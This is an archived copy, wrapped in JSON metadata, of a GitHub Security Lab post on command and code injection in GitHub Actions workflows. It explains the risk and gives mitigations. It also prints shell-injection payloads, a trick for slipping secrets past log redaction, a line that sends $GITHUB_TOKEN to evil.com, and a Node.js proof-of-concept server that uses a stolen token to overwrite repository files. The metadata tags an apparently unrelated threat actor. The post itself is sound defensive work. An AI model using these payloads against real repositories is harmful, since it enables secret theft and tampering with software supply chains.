{
	"id": "549d099d-03fd-4c3d-a20b-50324d60f800",
	"created_at": "2026-04-06T02:11:15.221855Z",
	"updated_at": "2026-04-10T03:24:29.088102Z",
	"deleted_at": null,
	"sha1_hash": "42a17d230d8a4369be22bc55fd02c8093bd9c77c",
	"title": "Keeping your GitHub Actions and workflows secure Part 2: Untrusted input",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 113863,
	"plain_text": "Keeping your GitHub Actions and workflows secure Part 2:\r\nUntrusted input\r\nBy jarlob\r\nPublished: 2021-08-04 · Archived: 2026-04-06 01:57:40 UTC\r\nThis post is the second in a series of posts about GitHub Actions security. Part 1, Part 3, Part 4\r\nSecure your workflows with CodeQL: You can enable CodeQL for GitHub Actions to identify and fix the\r\npatterns described in this post.\r\nWe previously discussed the misuse of the pull_request_target trigger within GitHub Actions and workflows.\r\nIn this follow-up piece, we will discuss possible avenues of abuse that may result in code and command injection\r\nin otherwise seemingly secure workflows.\r\nGitHub Actions workflows can be triggered by a variety of events. Every workflow trigger is provided with a\r\nGitHub context that contains information about the triggering event, such as which user triggered it, the branch\r\nname, and other event context details. Some of this event data, like the base repository name, hash value of a\r\nchangeset, or pull request number, is unlikely to be controlled or used for injection by the user that triggered the\r\nevent (e.g. 
a pull request).\r\nHowever, there is a long list of event context data that might be attacker controlled and should be treated as\r\npotentially untrusted input:\r\ngithub.event.issue.title\r\ngithub.event.issue.body\r\ngithub.event.pull_request.title\r\ngithub.event.pull_request.body\r\ngithub.event.comment.body\r\ngithub.event.review.body\r\ngithub.event.pages.*.page_name\r\ngithub.event.commits.*.message\r\ngithub.event.head_commit.message\r\ngithub.event.head_commit.author.email\r\ngithub.event.head_commit.author.name\r\ngithub.event.commits.*.author.email\r\ngithub.event.commits.*.author.name\r\ngithub.event.pull_request.head.ref\r\ngithub.event.pull_request.head.label\r\ngithub.event.pull_request.head.repo.default_branch\r\ngithub.head_ref\r\nhttps://securitylab.github.com/resources/github-actions-untrusted-input/\r\nPage 1 of 7\n\nDevelopers should carefully handle potentially untrusted input and make sure it doesn’t flow into API calls where\r\nthe data could be interpreted as code.\r\nVulnerable Actions\r\nFor the Ekoparty 2020 CTF my colleague Bas Alberts created an intentionally vulnerable Action, written in\r\nPython, that took the body of an issue creation event and used it to construct a system command in an insecure\r\nway:\r\nos.system('echo \"%s\" \u003e /tmp/%s' % (body, notify_id))\r\nThe CTF players were able to inject a shell command by creating a specially crafted issue that abused the insecure\r\nhandling of untrusted input. As it turns out, truth is often stranger than fiction and I started finding similarly\r\nvulnerable GitHub Actions in the wild. 
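The Ekoparty pattern above can be sketched in a few lines of Python (a minimal simulation, not the actual CTF code; the payload string and the shlex.quote fix are illustrative):

```python
import shlex

def build_command_unsafe(body: str, notify_id: str) -> str:
    # Mirrors the vulnerable pattern: untrusted issue text is pasted
    # straight into the shell command line.
    return 'echo "%s" > /tmp/%s' % (body, notify_id)

def build_command_safe(body: str, notify_id: str) -> str:
    # shlex.quote wraps the untrusted value so the shell treats it as
    # a single literal word instead of interpreting it.
    return 'echo %s > /tmp/%s' % (shlex.quote(body), shlex.quote(notify_id))

# A crafted issue body closes the double quote and smuggles in a command.
payload = '"; curl http://attacker.example/pwn; echo "'
unsafe = build_command_unsafe(payload, 'notify')
safe = build_command_safe(payload, 'notify')

print('curl http://attacker.example/pwn' in unsafe)  # the payload escapes the quotes
print(safe)  # the whole payload stays inside one single-quoted word
```

Passing untrusted text to the shell at all is the underlying mistake; quoting merely contains the damage when the shell cannot be avoided.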
For example, the atlassian/gajira-comment Action.\r\nThis GitHub Action synchronizes GitHub issue comments with a corresponding ticket in an internal Jira server.\r\nBelow is an example usage:\r\nuses: atlassian/gajira-comment@v2.0.1\r\nwith:\r\n comment: |\r\n Comment created by {{ event.comment.user.login }}\r\n {{ event.comment.body }}\r\nIn the comment argument we can see a custom templating syntax. The Action was using lodash to interpolate\r\nvalues in {{ }} internally. This is safe as long as the template is controlled only by the creator of a workflow.\r\nUnfortunately, it was mistakenly documented that users of this Action should use the GitHub expression syntax,\r\n${{ }}. This opened the door to a double expression evaluation vulnerability.\r\nLet’s say the Action user defined a workflow like:\r\nuses: atlassian/gajira-comment@v2.0.1\r\nwith:\r\n comment: |\r\n Comment created by ${{ event.comment.user.login }}\r\n ${{ github.event.comment.body }}\r\nIn the normal use case, the template would be evaluated even before reaching the Action, into something like:\r\n Comment created by SomeUser\r\n It doesn't work on my machine.\r\nThere would be nothing left for the Action to evaluate internally, and it would work as expected. However, if the\r\nuser’s comment itself contained double curly braces, like {{ 1 + 1 }}, the argument would be evaluated into:\r\n Comment created by SomeUser\r\n {{ 1 + 1 }}\r\nThen the Action would treat it as valid template syntax and lodash would interpolate it into:\r\n Comment created by SomeUser\r\n 2\r\nThe untrusted user input was used to generate a template that supports expression interpolation. 
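The two evaluation passes can be sketched with a toy interpolator (a hypothetical stand-in for lodash templating; the eval-based engine is deliberately simplistic):

```python
import re

def interpolate(template: str) -> str:
    # Toy template engine: evaluates {{ expr }} and substitutes the result.
    # Real engines such as lodash templates are similarly expression-capable,
    # which is what makes double evaluation dangerous.
    return re.sub(r'\{\{(.+?)\}\}',
                  lambda m: str(eval(m.group(1))),  # intentionally unsafe
                  template)

# Pass 1: GitHub substitutes ${{ github.event.comment.body }} into the
# 'comment' argument, so the attacker's text lands in the template.
comment_body = '{{ 1 + 1 }}'  # attacker-controlled comment text
template_after_github = 'Comment created by SomeUser\n' + comment_body

# Pass 2: the Action runs its own template engine over the result and
# evaluates the braces the attacker supplied.
result = interpolate(template_after_github)
print(result)
```

In the real vulnerability the second pass ran inside the Action with access to Node.js builtins, which is why interpolation escalated to code execution.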
The templating\r\nengine in question, lodash, was powerful enough to run arbitrary Node.js code in the context of the GitHub\r\nActions runner.\r\nScript injections\r\nA different example involves scenarios where the injection sink is directly located in the workflow inline script.\r\nGitHub Actions supports its own expression syntax that allows access to the values of the workflow context. A\r\nworkflow author often doesn’t even need to call any specific Action, as a lot can be accomplished using inline\r\nscripts with workflow expressions alone, e.g.:\r\n- name: Check title\r\n run: |\r\n title=\"${{ github.event.issue.title }}\"\r\n if [[ ! $title =~ ^.*:\\ .*$ ]]; then\r\n echo \"Bad issue title\"\r\n exit 1\r\n fi\r\nThe issue here is that the run operation generates a temporary shell script based on the template. The\r\nexpressions inside of ${{ }} are evaluated and substituted with the resulting values before the shell script is run,\r\nwhich may make it vulnerable to shell command injection. Attackers may inject a shell command with a payload\r\nlike a\"; echo test or `echo test`.\r\nIn the case of a call to an Action like:\r\nuses: fakeaction/checktitle@v3\r\nwith:\r\n title: ${{ github.event.issue.title }}\r\nthe context value is not used to generate a shell script, but is passed as an argument to the Action, so it is not\r\nvulnerable to injection.\r\nMost people understand that issue title, body, and comment contents in GitHub event contexts are fully\r\ncontrollable by would-be attackers. But there are also other less intuitive sources of potentially untrusted input.\r\nOne of them is the originating branch name for a pull request. The allowed charset for branch names is somewhat\r\nlimited, and branches cannot have spaces or colons in their names. 
However, command injection is still possible.\r\nFor example, zzz\";echo${IFS}\"hello\";# would be a valid branch name. As we will see later, this is more than\r\nenough for attackers to compromise the target repository.\r\nAnother less obvious source of untrusted input is email addresses. As described in the Wikipedia article on email addresses,\r\nthey can be quite flexible in terms of their content. All the listed addresses below are valid according to\r\nthe relevant IETF standards and subsequent RFCs (5322, 6854):\r\n\" \"@example.org\r\nmailhost!username@example.org\r\nuser%example.com@example.org\r\nThe address format is so complex that many validation scripts may erroneously block registration of a valid but\r\nless common email address. Nevertheless, an email address like `echo${IFS}hello`@domain.com is perfectly\r\nvalid and may be used both for shell injection and for receiving email at the same time.\r\nExploitability and impact\r\nLet’s say there is a workflow with unsafe usage of an issue title in an inline script:\r\n- run: echo \"${{ github.event.issue.title }}\"\r\nIt can be injected with titles like z\"; exit 1;# or `id`. This allows arbitrary attacker-controlled command\r\nexecution, similar to the arbitrary code execution discussed in the previous post. So what can an attacker achieve\r\nwith this kind of access in the context of a GitHub Actions runner?\r\nWorkflows triggered via the pull_request event have read-only permissions and no access to secrets. However,\r\nthese permissions differ between the various event triggers such as issue_comment, issues, and push. An\r\nattacker could try to steal the repository secrets or even the repository write access token. 
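The echo example above can be reproduced locally (a minimal sketch using Python and bash; the title string is illustrative, and the environment-variable variant previews the mitigation recommended at the end of the post):

```python
import os
import subprocess

title = 'z"; echo INJECTED;#'  # attacker-controlled issue title

# Unsafe: the runner substitutes the expression into the script text, so
# the quote in the title terminates the string and a new command runs.
unsafe_script = 'echo "%s"' % title
r1 = subprocess.run(['bash', '-c', unsafe_script],
                    capture_output=True, text=True)

# Safe: the script only references an environment variable; the untrusted
# value never becomes part of the shell's source text.
r2 = subprocess.run(['bash', '-c', 'echo "$TITLE"'],
                    capture_output=True, text=True,
                    env={**os.environ, 'TITLE': title})

print(r1.stdout.splitlines())  # the injected echo executed
print(r2.stdout.strip())       # the title is printed verbatim, nothing runs
```

The difference is where the untrusted value enters: as shell source text in the first case, as ordinary process data in the second.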
If a secret or token is set\r\nto an environment variable like:\r\nenv:\r\n GITHUB_TOKEN: ${{ github.token }}\r\n PUBLISH_KEY: ${{ secrets.PUBLISH_KEY }}\r\nit can be directly accessed through the environment, as demonstrated with, e.g., `printenv`.\r\nIf the secret is used directly in an expression like:\r\n- run: publisher ${{ secrets.PUBLISH_KEY }}\r\nor\r\nuses: fakeaction/publish@v3\r\nwith:\r\n key: ${{ secrets.PUBLISH_KEY }}\r\nthen, in the first case, the generated shell script is stored on disk and can be accessed there. In the second case, it\r\ndepends on how the program uses the argument. For example, docker login stores credentials on disk in\r\n$HOME/.docker/config.json, the gajira-login Action stores the credentials in $HOME/.jira.d/credentials, and\r\nthe actions/checkout Action by default stores the repository token in a .git/config file unless the persist-credentials: false argument is set. Even if this is not the case, the repository token and secrets are still in\r\nmemory. Although GitHub Actions scrubs from memory any secrets that are not referenced in the workflow or in an\r\nincluded Action, the repository token, whether it is referenced or not, and any referenced secrets can be harvested\r\nby a determined attacker.\r\nThe next question for the attacker is how to exfiltrate such secrets from the runner. GitHub Actions automatically\r\nredacts secrets printed to the log in order to prevent accidental secret disclosure, but this is not a true security\r\nboundary since it is impossible to protect against intentional logging, so exfiltration of obfuscated secrets is still\r\npossible. For example: echo ${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200};. Also, since the attacker may\r\nrun arbitrary commands, it is possible to simply make an HTTP request to an external attacker-controlled server\r\nwith the secret.\r\nGetting a repository access token is a bit harder. 
An Action runner gets a generated token with permissions that are\r\nlimited to the repository that contains the workflow and which expires after the workflow completes. Once\r\nexpired, the token is no longer useful to an attacker. One way to work around this limitation is to automate the\r\nattack and perform it in fractions of a second by calling an attacker-controlled server with the token, e.g.: a\"; set +e; curl http://evil.com?token=$GITHUB_TOKEN;#\r\nThe attacker server can use the GitHub API to modify repository content, including releases. Below is a proof-of-concept\r\nserver that uses the leaked repo token to overwrite package.json in the root of an affected repository:\r\nconst express = require('express');\r\nconst github = require('@actions/github');\r\nconst app = express();\r\nconst port = 80;\r\napp.get('/', async (req, res, next) =\u003e {\r\n try {\r\n const token = req.query.token;\r\n const octokit = github.getOctokit(token);\r\n const fileContent = Buffer\r\n .from('{\\n}')\r\n .toString('base64');\r\n // this is a targeted attack, repo name can be hardcoded\r\n const owner = 'owner';\r\n const repo = 'repository';\r\n const branchName = 'main';\r\n const path = 'package.json';\r\n const content = await octokit.repos.getContent({\r\n owner: owner,\r\n repo: repo,\r\n ref: branchName,\r\n path: path\r\n });\r\n await octokit.repos.createOrUpdateFileContents({\r\n owner: owner,\r\n repo: repo,\r\n branch: branchName,\r\n path: path,\r\n message: 'bump dependencies',\r\n content: fileContent,\r\n sha: content.data.sha\r\n });\r\n res.sendStatus(200);\r\n next();\r\n } catch (error) {\r\n next(error);\r\n }\r\n});\r\napp.listen(port, () =\u003e {\r\n console.log(`Listening at http://localhost:${port}`);\r\n});\r\nThe best practice to avoid code and command injection vulnerabilities in GitHub workflows is to set the untrusted\r\ninput value of the 
expression to an intermediate environment variable:\r\n- name: print title\r\n env:\r\n TITLE: ${{ github.event.issue.title }}\r\n run: echo \"$TITLE\"\r\nThis way, the value of the ${{ github.event.issue.title }} expression is stored in memory and used as a\r\nvariable instead of influencing the generation of the script. As a side note, it is a good idea to double-quote shell\r\nvariables to avoid word splitting, but this is one of many general recommendations for writing shell scripts, not\r\nspecific to GitHub Actions.\r\nIn order to catch and prevent the usage of these dangerous patterns as early as possible in the development lifecycle,\r\nthe GitHub Security Lab has developed CodeQL queries that can be integrated by repository owners into their\r\nCI/CD pipeline. Please note that currently the queries depend on the CodeQL JavaScript libraries. In practice, this\r\nmeans that the analyzed repository must contain at least one JavaScript file and that CodeQL is configured to\r\nanalyze this language.\r\nThe script_injections.ql query covers the expression injections described in this article and is quite precise. However, it\r\ndoesn’t do data-flow tracking between workflow steps. The pull_request_target.ql results require more\r\nmanual review to identify whether the code from the pull request is actually handled in an unsafe manner, as was explained in\r\nthe previous post.\r\nConclusion\r\nWhen writing custom GitHub Actions and workflows, consider that your code will often run with repo write\r\nprivileges on potentially untrusted input. Keep in mind that not all GitHub event context data can be trusted\r\nequally. By adopting the same defensive programming posture you would employ for any other privileged\r\napplication code, you can ensure that your GitHub workflows stay as secure as the actual projects they service.\r\nThis post is the second in a series of posts about GitHub Actions security. 
Read the next post\r\nSource: https://securitylab.github.com/resources/github-actions-untrusted-input/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securitylab.github.com/resources/github-actions-untrusted-input/"
	],
	"report_names": [
		"github-actions-untrusted-input"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441475,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/42a17d230d8a4369be22bc55fd02c8093bd9c77c.pdf",
		"text": "https://archive.orkl.eu/42a17d230d8a4369be22bc55fd02c8093bd9c77c.txt",
		"img": "https://archive.orkl.eu/42a17d230d8a4369be22bc55fd02c8093bd9c77c.jpg"
	}
}